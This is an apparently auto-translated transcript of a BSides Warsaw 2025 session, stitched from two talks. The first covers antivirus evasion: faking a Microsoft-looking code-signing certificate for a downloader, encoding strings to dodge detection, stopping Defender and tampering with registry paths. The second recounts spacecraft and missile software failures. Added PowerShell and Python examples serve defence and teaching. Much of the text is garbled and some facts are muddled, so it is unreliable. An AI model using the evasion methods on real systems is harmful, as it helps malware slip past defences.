
Security BSides Warsaw 2025, track 1, day 2

BSides Warsaw · 2025 · 3:40:07 · 384 views · Published 2025-11
Category: Technical · Style: Panel

Transcript [en]

in the adequate version of the existing system. No human force can make it think for 5 minutes about generating code that finally satisfies me; it hallucinates, and the code it delivers cannot be run by PowerShell at all. So if this codebase is small, it's a problem, but when it comes to malware and such ugly tricks, it's not a big deal. I said that one of the techniques is Code Harder. Instead of asking AI, the question is whether... The first piece of code looks like this. If it's not visible, I'll make it a bit bigger. Maybe it will be better. It's code in C. Hello World would be too trivial here. I didn't break any compiler. These

are not my compilers where I've stolen a compiler to inject executable code. This can be done, but it's a completely different topic, how to break software tools. We are angry with VS Code, Visual Studio. You can do a miracle with a modified GCC or any other compiler. This is not the topic of this session. None of my compilers are broken. So I have a piece of hello.c. Of course, among the things I have ready, I also have my hello.c here. First, Compile32 generated my hello.c in a 32-bit version. Compile64 does the same in a 64-bit version. When I show the file that interests me, HelloGCC, all these are freshly compiled files, as you can see. It checked, calculated the hash function of this file, calculated the hash

and saw that there is no such hash in the database. Well, there isn't, because I just compiled it; it's still besides.shav. And I also have to confirm the upload of the executable file. Please don't do it, I won't consider it. Because you share this file with the whole world. There is a really large number of people who are willing to use new files that are found on VirusTotal. When a new file is found on VirusTotal (I used to do such telemetry exercises, let's call it that), it was launched in eight digital copies. And it actually looks like that. There are a lot of people who are willing to use it. I have identified about 30,000

IP addresses from which my code reported back, code which I put on VirusTotal to see what happens. So it will definitely spread around the world. Please be sure that you want to do it and that you are allowed to do it. Not every file is licensed to be shared with the whole world, and you click on it. I want to upload it, and here it will be the 64-bit one. I want to upload it. They are now being analyzed by various antivirus engines. Because the files are unknown, these antiviruses have to look at them. So Hello World in the B-sideWAF is, for four antivirus engines, the one compiled with GCC, malware, because yes. I have a screenshot from a conversation with one of the people who helped make a DLL that was detected as misbehaving. In

the DLL he put the word "mimikatz". The number of antivirus engines that cut the DLL out of the client's computers was overwhelming. We encoded it in Base64, and they stopped caring about it. It proves many things. So, Hello World in GCC is four antiviruses. They say it's bad in GCC. The 32-bit code in the TC2 version, two antiviruses; the 64-bit code from the same computer, and one antivirus says it's bad code. Excuse me, but there is a large Polish corp that has been looking for an intrusion in its system for three and a half months, because SOCIM announced that EDR, analyzing the backup, finds malicious content. Were these signatures from the antivirus documentation? Oh, oh. A little

bit of what I said about offline scanners, and they were shouting at each other, which from the point of view of business competition is good, but for the user... But you know, it still tripped us up, why? Because there is Intune Wheel created by Damian Van Robbe, who is probably an MVP, and if you use this version of it, I will recommend it, it's cool, but if you use the graphical version, there is an EXE and Defender trips over it. And there on the website we describe that it is a false positive. Unfortunately, yes. It was easy. I used PowerShell magic: the string bsides.wav I converted to hex; I will

not retype it because it takes time. I have it ready here. This is the string in hex, bsides_wraps. What do I do? I push the string onto the stack four bytes at a time, ending with zero. Hello World. It's the same Hello World, but done in a different way. At the end, I take 16 bytes off the stack, these four things that I pushed, 4 bytes each, because in C the so-called calling convention says: "When you call a function, then clean up what you prepared for calling this function." When I now compile this code, Ctrl+B, it has been compiled. It is available, I have it ready, it is here. This is the one with the

new date, 9:25. Shift + right click, copy as path, and now I try to copy the same string using the absolutely hacker functionality called assembler; it must be bad when it is in assembler. I don't know what the effect will be, because these are always live things; hopefully it doesn't disappoint me. These are different results. This is the same "Hello World". This program does nothing else, and as I said, I really did not tamper with the antivirus. When I paste it here, it will write what it is supposed to write. There is nothing else there. When I start debugging it, you will see that it is exactly the same. There are four values pushed on the stack, one "call print", a 16-byte removal from the stack, that's what it does.

Nine antivirus engines say, um, that we will start playing with heuristics, analysis, looking at what is happening, what someone is doing here. And there is such a behavioral analysis in VirusTotal. It is probably still running. Well, it will end someday; it takes a long time. But when you start looking at what this piece of code does, which literally pushes 16 bytes onto the stack, calls a library function and takes 16 bytes off the stack, then in this analysis you will see, maybe it will be updated, Google software which is installed in this sandbox. This is where files from Google start to arrive in the sandbox. Let's guess why. We will have in the analysis

results that my malware is a dropper, because new accounts appeared, signed by Google. This is the quality of current solutions, and we have to deal with it. Such a text was found in my... I wonder what it is about, and please tell me where it is in my book, because I'm sure it wasn't there. I would compile this code. Similarly to a whole lot of other things that will be mentioned here. It's still spinning; let's see if it finished the analysis in the other one. These were also simple things to analyze. Maybe there will be a little more to see.

Not much yet, but OK. Something is starting to happen. Yes, yes, yes, "Observable delivery is not working". But at least I don't see any dropped files. Something has improved, that's good. Maybe not yet... So it looks dramatic when it comes to the quality we get. I will show you one more thing. I wrote the evil code, of course. If someone knows it, maybe I do such a thing. This is a dropper written in C#. So a file, a URL, something like exaclty.com/besides/exe. That's all. It's a download from C#, which says whether it worked or not. It's hard to find something simpler. Why C#? Because it's another wonderful thing I can play with against antiviruses. Because a compiler may arouse some suspicion when

it is found on the computer of a poor user, but the C# compiler is built into every Windows. In Microsoft.NET\Framework64, in the appropriate version, csc.exe is a C# compiler. And if I use it to compile this wget_besides.cs, I will get the file wget_besides.exe. I copy it: wget_besides.exe, wget_besides_unsigned.exe, let's call it unsigned. So I have copied it and I have a PowerShell script. I'll show it in a moment and try to explain what this script does. Because this script does something, I would say, very trivial. I find explorer.exe, a legitimate one, I'm a grouch. I read out of Explorer the certificate with which Explorer is signed, obviously. Then I make a new

self-signed certificate which has identical parameters to the Explorer certificate, and I sign my wget B-Sides with it. What will not be correct in this digital signature at first glance? Primarily, it is self-signed. It is probably telling me why the path is null. Which path? Did I mix something up in the file name? I guess not. "E at the end." Yes, I know, I deleted it a moment ago. I'm looking at what happened here. Certificate is null, and this one has read it. My cert has written something, so I have a certificate. Cert, signer certificate. I should have... there is some... I do self-sign, no, because it is not the right topic. Yes, it would be too beautiful. I don't have it, so I don't

even have to delete it. F5. Oh, UnknownError is the correct error, because of course Windows will recognize that this certificate is invalid, because it is self-signed. That's what UnknownError means. And now what I will do: I will upload the unsigned and the signed file to VirusTotal. So I have my wget_besides; this one is signed. I made a copy of this one. Unsigned. It's not signed. Confirm upload. Such a downloader, you can already suspect that it is doing some ugly things. So here this downloader has a chance to trigger various alarms, which is logical. If something downloads a file from a strange domain, writes it to disk, and then tries to open it there, then

I would... It's a question of how we define whether something is a virus. There was a bit about it at the beginning. Knowing that there is some potential for maliciousness, I would assume that it is malicious. Eleven antivirus engines said that this signed piece of code is malicious. Please remember that a digital signature does not prove in any way that the file is not malicious. It is completely natural. But what did they base this maliciousness on? That it is only a website? That it is downloading something from the Internet and they are not familiar with it. These are the criteria. I'll show you how it looks in code. I mean, how it looks in code. The same file after signing

in an absolutely incorrect way, not in accordance with what is there: a digital signature, a self-signed signature claiming that it is from Microsoft. Yes, of course, I can believe it. What is the difference between 11 and 5 detections? Only the result of a stupid signature. But... I have screenshots somewhere; it didn't work out well here, because I had cases, when I played with it, where the file that was not digitally signed was detected as malicious by Microsoft Defender. When I signed the same file with a fake Microsoft certificate, Microsoft Defender said: "Oh, it's not a virus, okay, go ahead". Something has changed. Defender is no longer there. Praise God. I will not bother you much more about antiviruses. Generally, to make it work, you have to

seriously think about how we want it to work. The last question is a serious one. Do we want such things to be blocked by the antivirus or not? What is the antivirus supposed to do? There was a question about how antiviruses work. More or less like that. This is generated code; someone once published a calculator and did it this way. I have a suspicion, bordering on certainty, that inside antiviruses work the same. If something resembles a known virus, or there is some mysterious criterion... Try to ask antivirus vendors how it works inside. "Oh no, hackers would take advantage of it if we said that." It won't be like that. They won't say it at all. It looks wonderful

in various similar procurement and tender procedures. If we look at what serious procurement departments do with IT, they are supposed to compare the so-called features, and write out what one antivirus can do, what the other antivirus can do, color cells in Excel, weigh it against the price, do some magic. I took part in a project (whoever wants to can find it by the name of the feature; I will not name the vendor) where one of the vendors had in his antivirus a special feature to recognize unknown threats, and this feature is called SONAR. So in Excel there was a cell with the inscription "SONAR" and this vendor was lit green. And all other vendors were lit red. Because of course no

other vendor has something in its antivirus called "SONAR". So we asked this vendor: dear vendor, what is SONAR and how does it work, because we want to compare it with other antiviruses. Well, it is a special system that protects against harmful viruses. What does it do and how does it protect? It doesn't die. And this is how you compare antiviruses. I already mentioned everything else, the antivirus migration project, with the exception of the situation when we migrate from Microsoft to something else, because everyone knows this path and has it trained. And Symantec says Defender, Defender says Symantec. So it's a forced migration rotation. Just remember the news in September, a year and a half ago, almost, how CrowdStrike definitions were empty, what

the media talked about for two days, and about which everyone in Poland was an expert. So this works poorly, and at the moment I suspect that various AIs have been used to write antivirus code, so we can expect some kind of nightmare. We don't detect viruses by hard-core signatures. There is also too much of it to detect by regular signatures. I mentioned, I referred to my session about the virus-generating machine. I have a screenshot of the detection of my virus-generating solution. This is a screenshot from VirusTotal. This screenshot, in addition to a whole lot of different things, shows that there are 178,000 domains used by this virus. There were more; that's how many VirusTotal caught up to in its

databases. And that's where VirusTotal is today. I named the domains that way for a reason, so that no one would enter them. It's already gone. When I was playing this game, I generated more than 6 million other, significantly more accurate files in Bandomb. That's why those milliseconds in compilation were significant for me. They didn't look like they were over the top, I would say. If I were to run some statistics... for example, I have a web server; this is an example that I have here. Once my URL was found on some blog, and I said that when it appears on VirusTotal, it is a virus that is all over the world. When the information appeared on abuse.ch that my server distributes malware, those willing to scan it... From

the web server's logs are 200 kilobytes per day; this is a web server for friends to publish various strange things. A random number generator fed from a Geiger counter and similar projects are running there. There was once a progress bar, showing how much was left until the end of the presidential term, in a GIF generated on the counter, and so on. This is that kind of web server. And these are hundreds of kilobytes of log per day. After abuse.ch published that this server distributes malware, I forget why, the logs of this server started to be gigabytes. I can see it. Something comes out of the statistics, because suddenly these numbers, when I have a folder with logs open, and I have one log

per day, I did it on purpose, these are the numbers, and suddenly a bit of a chaos curve is made from the file sizes visible in Explorer; these numbers stretch to such disturbing sizes. And I see it as a thing of beauty. 78,000 domains is not something that Bayer and Stotter would see, simply. They didn't react at all. So it doesn't say directly what volume of data we actually have related to viruses, but I would guess there is a lot. I talked about the conversation screenshot, antiviruses, and "discovery" is a bad word. If you want to play with antivirus, please do it. I even have a command line, but I need two escapes. I write a test string

on the screen. We are talking about Defender. There are actually three names: Cels, Apex, I don't remember what the third one was. Microsoft said "this is by design" and in the next antivirus definition it didn't work like that anymore. I love this kind of by design at Microsoft. Why msiexec? To make the installations faster. Because it's a programmable file that is responsible for the installation. I have it somewhere on GitHub; I'll publish it if someone of you is very interested. I publish a file allowing you to make such an MSI engine yourself. You can play with it. However, it will already be detected in older systems without antivirus fixes. The next thing I came across when I was teaching classes at school: I

was talking about a protected process that cannot be killed. It seemed to me that it was impossible to kill it. Antivirus is a protected process and cannot be killed. Microsoft has... Microsoft. I wanted to show that if you can't distinguish between right and left, then stop it. I decided to see if malware would start. I did it live for some training. I came back after a break, looking at the comments. That's how the "give me money" goes. The technique of stopping MsMpEng has recently changed. A few months ago, a very ambitious and interesting model was developed, and then it stops for a moment, and it's enough to catch it there. I was brutally stopping it for a long

time; now it is not allowed to stop it so brutally, but it can be done this way. Logically, there are many things that can be stopped which are protective processes; for example, Sysmon can be stopped, nothing goes to the logs, etc. The creators forgot about this event. Antiviruses try to defend themselves against manipulation. Simple antivirus manipulation: I change the name of the antivirus exe, restart the computer, and when the name is changed, it won't work because there is no original exe. So they started to detect it. We started to change the folder names. So the entire path monitored by the antivirus on the file system is analogous to the registry. So I went in there, running

a session about where Android is in Windows: load the path from the registry, modify it in binary, load it, change the control set number, and it turns out that the new system is not loading the antivirus because the path does not match, and nobody was watching there because they did not watch it. Generally, the techniques in which the antivirus is deceived by the administrator may be useful, but they should not be used. The antivirus should not be used by the administrator. At least by assumption. If it is possible to do it as a regular user, then it is a little more of a waste. Such a scenario, closer to a regular user, I once found, made by design. In Windows 11 and modern frameworks, it

looks like this: compiling a piece of code sometimes requires reading hundreds of thousands of source code files from the framework and tens of thousands of writes to disk after compilation. When the antivirus starts to cling to what the developer is doing while compiling his code, it turns out that compiling a piece of code with the framework and dependencies takes, for example, 11 minutes. So what developers started to do to be clever is to turn off the antivirus. I have my own folders where I work; I have the antivirus turned off there. But turning the antivirus off only speeds things up a little bit, because they make it so that there is no detection, but the driver is still engaged as a minifilter driver. So it would be better

to unload the antivirus driver from the I/O stack. So Microsoft announced with a smile on their faces that they are introducing something called Dev Drive in Windows 11. A special disk for developers. If we properly format the disk, mount it and add a few more parameters in the fsutil tool, we will unload the antivirus stack from this disk. It's like running a script on half of the screen, and we have a place where no antivirus will catch anything. Just like that. Is it good or bad? It's like a marketing tool. I don't know if it's marketing. It's possible to bypass the antivirus with bare hands, a piece of a stick, and the whole game is in Windows. That's why I say it's not

even exciting, or at least it shouldn't be too much. I'll try to get back to my Hello World. They are still being scanned, but I see that something is changing in the registry. Yes, they definitely changed something in the registry, the game "Inside". I don't see any connection to the Internet; it's a pity, because there must be some... OK, going back to the slides, because it is slowly time to do it. Where is my presentation? This part should be marked with three dots. What to do when we are on the good side of the Force? We go to the whitelisting side. We start explicitly listing the programs that can run in our system. With a single PC or the

whole organization. These are large projects, expensive projects, complex projects. When someone starts counting how many exes he has in the organization, he has to describe in what way. Please remember that the code is very reliable, and hackers know that. It is also packed in .exe files and .dll files. From the point of view of the code, there is absolutely no difference. The only difference is that the user can double-click an .exe and it will start, and if he double-clicks a .dll, it will not start. This is the end of the difference between these files, except for the binary nuances of the flags. So DLLs should

also be monitored by application whitelisting, and usually there are more of them than exes, which complicates the whole process. So we are in a strange moment: AI still can't help; we don't really know how to help there, so to speak, to specify the criteria for which piece of code is malicious, which is not a big challenge; even if I had wonderful power, a bit of anything, what will it do to me? As I said, it is difficult for me to say what I want to run and what not. It is difficult to define. So we are in a difficult moment. The antivirus will help us a little, but it is such a small little thing. Thank you very much.
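The self-signed "Microsoft" certificate demo above shows why a defender should never read a signature by its Subject string alone. The following check is an added example, not the speaker's script or any vendor's tooling; the file path is a placeholder, and it uses only the built-in Get-AuthenticodeSignature cmdlet plus the .NET X509Chain class to show what the UnknownError status in the talk actually means.

```powershell
# Added example (not from the talk): verify an Authenticode signature properly
# instead of trusting what the certificate's Subject claims.
param([string]$Path = 'C:\placeholder\wget_besides.exe')   # placeholder path

$sig = Get-AuthenticodeSignature -FilePath $Path

# 1. Status must be Valid. A self-signed certificate cloned from explorer.exe
#    yields UnknownError: the signature parses, but Windows cannot build a
#    trusted chain for the signer, so the file must be treated as unsigned.
if ($sig.Status -ne 'Valid') {
    "{0}: status {1} ({2})" -f $Path, $sig.Status, $sig.StatusMessage
}

$cert = $sig.SignerCertificate
if ($cert) {
    # 2. Subject equal to Issuer marks a self-signed certificate. A legitimate
    #    code-signing leaf is issued by a CA, so for a leaf this is a red flag
    #    no matter what "CN=Microsoft ..." text was typed into the Subject.
    $selfSigned = ($cert.Subject -eq $cert.Issuer)

    # 3. Build the chain ourselves and record why it fails (e.g. UntrustedRoot).
    $chain = New-Object System.Security.Cryptography.X509Certificates.X509Chain
    $chain.ChainPolicy.RevocationMode = 'NoCheck'   # offline demo; use Online in production
    $chainOk = $chain.Build($cert)
    $reasons = ($chain.ChainStatus | ForEach-Object { $_.Status }) -join ', '

    # 4. Report the facts a SOC analyst needs: the thumbprint identifies the
    #    signer; Subject text does not.
    [pscustomobject]@{
        File       = $Path
        Status     = $sig.Status
        Subject    = $cert.Subject
        Issuer     = $cert.Issuer
        SelfSigned = $selfSigned
        ChainValid = $chainOk
        ChainError = $reasons
        Thumbprint = $cert.Thumbprint
    }
}
```

Run it against both copies from the demo: the unsigned file reports NotSigned, the self-signed one reports UnknownError with SelfSigned true and ChainValid false, and only a file chaining to a trusted root reports Valid.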

...to keep clicking the Enter button, and you can still irradiate the patient. Why stop the system if the bugs are not blocking? In addition, there are... ...because it is on the test stand, so you need to... ...the test firmware has all the functions needed in production plus additional functions needed in the test environment on the ground. But the component activation procedures should not be used with the probe in space, because they may be called by accident. They are not needed during flight, only during testing. Modifying firmware requires special programmers; those were EEPROMs. It takes time, effort, the programmer is in a different place, you have to go there with the installed systems, and here comes the phone call from the Central Committee: quickly, because we have an important

holiday here, we have to announce the success that the probe has flown. So they thought to themselves, it will fly with the test firmware, it will be tagged on the way, what can go wrong? After all, it has all the production functions. So it goes with this test firmware, but the operator who still gives the spacecraft commands does the same thing: does not enter the password for some command, and the test commands had a password, the production commands did not have one, he does not enter this password and gets a test command that should not be there. Of course, this situation was foreseen, and there were mechanisms that had to be followed, namely there

was a special computer that was supposed to verify all the operator's commands before they reached the spacecraft. But that computer was also broken, so they were not verified. So the commands went directly to the probe, and the engines controlling the height of the probe were turned off. The solar panels lost their orientation, the probe lost power, the probe died. The project was a complete success: the probe flew, but unfortunately it did not survive. So, first of all, the rush, because the test firmware flew; secondly, the operator made a mistake; thirdly, the procedures for checking whether the operator made a mistake did not work. Similarly, the Americans, when they send dangerous commands to spacecraft which are

already somewhere in space, have three operators who have to issue the same command. Just in case. It's just a manual procedure: if the three commands do not match, they do not send. They even take into account that two people can make the same mistake at the same time. Plus, if we send something into space or somewhere far away, it would be good to have some automatic self-healing algorithms. Here that is also missing. And Phobos 2, this time this one arrived. This one arrived at Mars. However, very funny things happened here, because they predicted that something might go bad. It might go bad, so let's make three computers. In case some cosmic

radiation damages something, there will be three computers and they will vote. If three computers vote, it will be good, because they can't all break. Three computers would all have to make a bad decision to make a bad decision, and three at once will not break, right? Well, two of them broke, and the third cannot outvote them, because it did not have a majority. So, cool idea, we'll send three computers, they'll vote, great idea, right? But no one predicted what would happen if the computers broke in such a way that they would stop voting at all, right? So the majority should be counted based on the majority that is present in the hall,

not the majority of all of them, and then everything would be fine. So, in the architecture, nobody predicted this kind of failure. Mars Global Surveyor, 1996: it's a story of a spectacular accident, of how many things can break at once because of one value written to a wrong memory cell. This is not the cause yet, because this is a failure mode which may or may not start, but it starts after 5 months. And it turns out that in the failure mode, because there was a small failure, the correct parameter was not given, and the solar panel moves to the

place where the antenna should be, which is also unfortunate. Why is it unfortunate? It is very unfortunate because the panel should cast a shadow on the battery, shielding it from solar radiation. The battery cannot have too high a temperature, because then it does not work optimally, so it has procedures such as: if the temperature is too high, then stop charging, because usually the temperature is too high if you charge too much, unless the sun shines on it. But the sun does shine on it, because the panel does not cover it, and it concludes that it is charging too much, so it stops charging it so that it does not

overcharge. The second battery is discharging; the first one does not charge, nor does the second one, because the panel is set up badly. It could be repaired if there was communication with the ground, but there is no communication with the ground, because the antenna is also set up badly. So it is one value that did not reach this commutator which caused such a cascade of events that the probe unfortunately died. And it was so nice. The procedures did not predict that you can make a mistake in such a specific way that you change the parameters of two settings. Ariane 5, flight 88, year 96: everything will be fine, because Ariane 5

is the successor of Ariane 4, what could go wrong? We have no sound, so I will tell you. Attention, the Mara... We count down: neuf, huit, sept, etc. Ariane 5 will fly soon. It will be fine for sure. Ariane 4 flies without any problem; Ariane 5 will definitely manage. And Ariane 5 flies. This is the biggest success series of European space thought. These rockets delivered payloads. They did everything as it should be done, they completed all missions, there was no loss of payload. So now we have to produce Ariane 5 to be the continuation of Ariane 4's successes. Ariane 5 is a little bigger, a little faster, it can carry a little more cargo to orbit. Full success, absolutely full success, beautiful launch,

everything is going well, the other ones are already behind us. We reach about 38 seconds of flight. Unfortunately, when it decides to turn back, the safety systems decide that maybe we will self-destruct it in case it returns too soon to the place where the people are. The view is spectacular. The most spectacular of all the detonations. It flew high enough for the propeller to be large enough. Expensive fireworks. Expensive. Not cheap at all. The face of the man who says it was not supposed to be like that. Nobody expected it. Why? Why did it have to turn back? I think the owner of the hotel told me before. Everything was the same. People who went

to watch it had absolutely spectacular views. Half dead and half saved. That's how it looked. Why did it decide to turn back after those 38 seconds of flight? So its predecessor had 20 years of successful launches. Everything works. It's such a tested system that nothing can go wrong. So we copy the entire navigation system from version 4 to version 5. What can go wrong? We copy. We have to learn something by the way. We have floating-point numbers that have very high precision, and signed integers in the computer that have low precision and can only take whole values from a range from a minus value to a plus value. Depending on how many bits we write, there is a range of values that we can write. With

a 64-bit variable, the range of values is quite extensive and the precision quite high. With a 16-bit number, we can write from -32,767 to +32,767. And now we have an internal system that measures flight parameters. It measures the horizontal velocity, and since Ariane 5 has been copied from Ariane 4, and Ariane 5 flies faster horizontally, because it is a larger rocket, it has to carry more cargo, it has to have a higher speed, it flies much faster, at some point the speed counter exceeds the value of 32,767 units. This is a problem, because when the speed increases, the 64-bit floating-point value is converted to a 16-bit signed integer, transferred from one to the other. But

when it gets to the other, it no longer fits. It exceeds the maximum value that can be written in this variable. The system did not anticipate that this value would be exceeded; it never exceeded it. The code was copied from 4. Now, when it exceeds the value, instead of the velocity value, the speed field contains the value of the error code, which also has a numerical value. And the system that reads the speed is not prepared to find an error value in the speed field, so it concludes that the speed of the rocket changed a thousand times, so we go back to Earth to check what happened. Generally, the rocket

disintegrates and needs to be blown up in the air so that it does not harm anyone. So, a sad end for a very nice rocket. Why did it happen? Of course, it's not that nobody thought about it, but in 4 there was no need to think. The variable was not marked as risky. In 4, it never reached even 90% of the value 32,767. In 4, the processor was a bit weaker. So, of course, it checked whether any variable was close to the critical value, but it could check only a few variables because it had too little power, and this variable was not critical, so it did not check it. Just so that there was some

power reserve. In the fifth there was a processor that could check all variables, but why, since in the fourth it was never needed, and they copied the fourth's code. So they did not check the value of this variable, etc. So they should have taken this into account, not ignored it. Mars Climate Orbiter, year 1999. It is supposed to be in Mars orbit and fly to its point, because in a moment another probe is going to fly to Mars, so the orbiter is supposed to watch how it lands there. So this orbiter is supposed to fly to Mars at a height of over 200 km, and it enters orbit 169 km too low. The lower it

is in orbit, the denser the atmosphere, and unfortunately we don't even know if it has crashed and flew somewhere into space or just burned out in this denser atmosphere. It entered the trajectory too low. The minimum was 80 km, it entered at 59 km, so it turns out that there was not much missing, and the mission would succeed. Why did it enter too low? Because the probe was built by Lockheed Martin, and NASA operated it. Lockheed Martin provided trajectory correction values. It had 4 trajectory correction points on the return to Mars. They targeted it generally well, but minimal corrections had to be made along the way. And there were four such points. Lockheed Martin received

information about how the probe was flying, calculated the necessary correction value and sent it to NASA. NASA sent these values to the probe. But Lockheed Martin gave these values in pounds, and NASA thought they were in newtons. And the difference in scale between one unit and the other is about 4.5. So the probe was getting corrections 4.5 times too weak, because whoever supplied the corrections did not give them in the right unit. According to the agreement between NASA and Lockheed, all values were to be in newtons, and NASA imposed that rule for the entire flight of the probe. Lockheed Martin built the probe and sent the corrections, and NASA treated these numerical values

as newtons, because that's what we agreed on, newtons, so everything will be OK. And the thrusters were making corrections, but they were 4.5 times too weak. And there were four different maneuvers, and after each of them you could see that the correction was too weak, because instead of moving to a more correct trajectory, the probe entered an even worse one. But these were quite small changes, so it was not so obvious that you would miss Mars or something like that. Interestingly, two navigators reported this problem. It turned out that the wrong form was used and it was not corrected. I recently gave this lecture in the army and laughed a lot. So, insufficient tests, because Lockheed tested on its own, NASA on its own, they didn't

test the whole process. The low budget of the operation, because that's why Lockheed did it rather than NASA directly, to make it cheaper. It was the first time that one party built and another operated. It was an experiment and it didn't work out very well. And a lack of communication: they never sat together in one room, never talked directly, and if they had met, even by accident they could have discovered that they were thinking in different units, so it certainly did not help. Three weeks later, the lander that the orbiter was supposed to observe was arriving at Mars, but the orbiter is not at Mars, so no one will observe it. The lander had exactly the same

problem in its design, but this problem was fixed, because they had realized why the orbiter failed. However, the lander failed too, only for a completely different reason, fortunately. We know that it didn't land properly, because it didn't respond after landing. We don't know what happened, because there was no orbiter to see what was happening, since the orbiter didn't make it. So we don't know the cause 100%, but we suspect what happened. The landing phase involved firing the rocket engines after the probe turned them towards the planet. The problem is that these rocket engines probably switched off too early and the probe simply fell onto Mars. The design requirements included

landing sensors that were supposed to check whether all three legs had touched the planet. At that moment they were supposed to switch off the engines, because if the legs were already on the planet and the engines were still running, there was a risk that the probe would tip over, the tip would break and it would be useless. So it was important to land properly. According to the post-incident analysis, it turned out that the rocket engines caused such vibrations in the already deployed legs that these vibrations induced spurious currents, which in turn induced a magnetic field strong enough for the magnetic sensors in the legs to say: "Aha, we have landed,

and the engines were cut off." This is just a theory, of course, because nobody was there; after the incident they tried to simulate it in a similar environment. In four attempts, it turned out that this is what happens every time. So we are 100% sure that this type of failure would occur, if only these tests had been carried out before the probe was sent. What's interesting is that there was information in the documentation that this risk exists, but the experts estimated that it was not so big. In fact it was 100%; it would have been necessary to confirm empirically that it was 100%, but the experts stated that it was small and it was not necessary to test it. So, insufficient

tests, because testing rocket engines firing toward the ground is not cheap. And an ignored problem, an underestimated risk. And quite seriously underestimated. Now something from the army. Saudi Arabia, during the Gulf War, the war with Iraq in 1991. The American army reserve is sitting in a military base in Saudi Arabia at a former airport. They know that even if Iraq sends its missiles at them, they have Patriots. Patriots were the best anti-missile system at the time. With their Patriots they can sleep peacefully. The Patriot's clock counts time in tenths of a second and records values such as 1, 2, etc. Each of these values is one tenth of a second. These values are stored in a 24-bit register, so you have to write

down zeros and ones, with some specific precision. So with every second there is an inaccuracy of about 0.000000095 seconds. This will certainly not be a problem, but if you are at this presentation, you already know where this story is going. Patriots were created to shoot down planes, and they didn't work badly at all. Interestingly, I think it's the first technology in which a missile shooting down something else doesn't hit it, but explodes next to it. It was quite a revolutionary idea that an explosion next to a plane takes the plane out much better than a direct hit, and it's much easier to explode next to something that's flying than to

hit it directly. You don't have to aim so precisely. So in general it worked quite well on planes, so well that the producers of Patriot, at some meeting, apparently in their corporation, thought: "Hmm, if we shoot so well, maybe we'll try to sell it to shoot down missiles." Someone said: "Missiles fly much faster." "Well, we'll improve the precision of the calculations and everything will be OK." And they improved the precision of the calculations and everything was OK, only they improved the precision in three places, and in the fourth they forgot. They increased the size of the registers, increased the accuracy of the calculations, because the speed was increasing, but unfortunately one of them was missed. Patriot, in general, got an update sent to Saudi Arabia. On February 25 the soldiers died, on February

26 the update was installed, and on February 28 the war ended. So sometimes you can have a really big problem in life. And a Patriot was never supposed to stay in one place longer than 8 hours. But it did. Some people do predict problems. As I show you many stories in which someone did not predict a problem, there are also stories in which someone did. That's why Swiss trains cannot have 256 axles. Listen carefully, you already know why. There is a counter somewhere on the tracks. These counters are 8-bit. When a train passes, they count how many axles there are. Based on this, they

say that there is a train and they can estimate its length. But if the train had 256 axles, after the last axle it would disappear from the system, because the counter wraps to zero. Can it happen in Poland? It is fascinating, because on the site that was the first to describe this example from the Swiss railways, in the comments there is a discussion among Polish experts, the so-called "mikole", who start arguing whether in Poland a train can have 256 axles. In Poland we have certain types of wagons and a certain maximum train length allowed by regulations. The other half of the experts agree and say that it is true

that you need to take some very specific wagons, some multi-axle tank cars, which can be arranged so that if we take 64 of them they will fit within the length limit, because we will have 3 meters of slack to actually meet all the requirements. But the problem is that we do not have that many multi-axle tank cars in Poland and we would have to borrow 12 from the Czechs and 6 from the Slovaks. So theoretically it is possible, but in practice it is not, because we don't have them. I recommend this discussion, it is fascinating. And there were cases when they were not unlucky. Everything works. But it is also worth remembering that sometimes things happen that young
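The three arithmetic failures told above (the Ariane 5 narrowing of a 64-bit value to 16 bits, the Patriot's 24-bit clock register, and the 8-bit axle counter), reproduced as an added Python example; this is not code from the talk. The target speed and the choice of 23 fractional bits are my assumptions, picked to reproduce the per-tick error the speaker quotes.

```python
from fractions import Fraction

# Added example, not code from the talk: small, checkable models of the
# three number-representation failures the speaker describes.

INT16_MIN, INT16_MAX = -32768, 32767


def to_int16_unchecked(value):
    """Ariane 5 style: narrow a 64-bit float to a signed 16-bit integer with no
    range check. Out-of-range input silently wraps around, so the field that
    should hold a speed holds something else entirely."""
    n = int(value) & 0xFFFF
    return n - 0x10000 if n >= 0x8000 else n


def to_int16_checked(value):
    """The guard the talk says Ariane 4 never needed: refuse values that do not fit."""
    n = int(value)
    if not INT16_MIN <= n <= INT16_MAX:
        raise OverflowError(f"{value!r} does not fit in a signed 16-bit integer")
    return n


def count_axles(n_axles, bits=8):
    """Track-side axle counter: an n-bit counter incremented once per axle."""
    mask = (1 << bits) - 1
    counter = 0
    for _ in range(n_axles):
        counter = (counter + 1) & mask
    return counter  # 256 axles on an 8-bit counter -> 0: no train seen


def tenth_of_second_fixed(frac_bits=23):
    """0.1 s as the Patriot's register stores it: the binary expansion of 0.1
    truncated to frac_bits fractional bits. 23 fractional bits is an
    assumption; it reproduces the commonly cited 0.000000095 s error per tick."""
    return Fraction(int(Fraction(1, 10) * 2 ** frac_bits), 2 ** frac_bits)


def patriot_drift(hours, frac_bits=23):
    """Accumulated clock error (exact, as a Fraction) after running for `hours`."""
    ticks = hours * 3600 * 10
    error_per_tick = Fraction(1, 10) - tenth_of_second_fixed(frac_bits)
    return error_per_tick * ticks


def patriot_range_error_m(hours, target_speed_m_s=1676, frac_bits=23):
    """Distance a target at target_speed_m_s (assumed) covers during the drift."""
    return float(patriot_drift(hours, frac_bits) * target_speed_m_s)


if __name__ == "__main__":
    print("40000.0 narrowed without a check:", to_int16_unchecked(40000.0))
    print("256 axles on an 8-bit counter:", count_axles(256))
    print("Patriot drift after 100 h:", float(patriot_drift(100)), "s")
    print("range error at 1676 m/s:", round(patriot_range_error_m(100)), "m")
```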

programmers did not dream of. For example, the leap year every 4 years; I think most of them are able to program that. But few anticipate that their program will still be running in 2100, just as the COBOL programmer in 1974 didn't anticipate that his work would still be driving the Polish economy and Polish banks today. But, for example, in 2400 there will be no such year, and which code does that relate to? And the code will still be running, and it will turn out that we have such chaos that we get down to some real, hand-written code from 1997. But as soon as the year changes, the libraries are

probably ready. I don't know if they take the leap second into account. Have you heard of the leap second? It's a very strange phenomenon, because the Earth rotates at varying speed, because we have some movements of magma inside, and the Earth sometimes rotates a little faster, a little slower. Most recently we adjusted the clock on December 31, 2016, and each of these steps since 1975 is an inserted leap second, because we add or subtract one, depending on how the Earth rotates. This is very bad; it was already very bad in 2016, because most computer programs do not anticipate that there is an extra second, because it happens so rarely, and

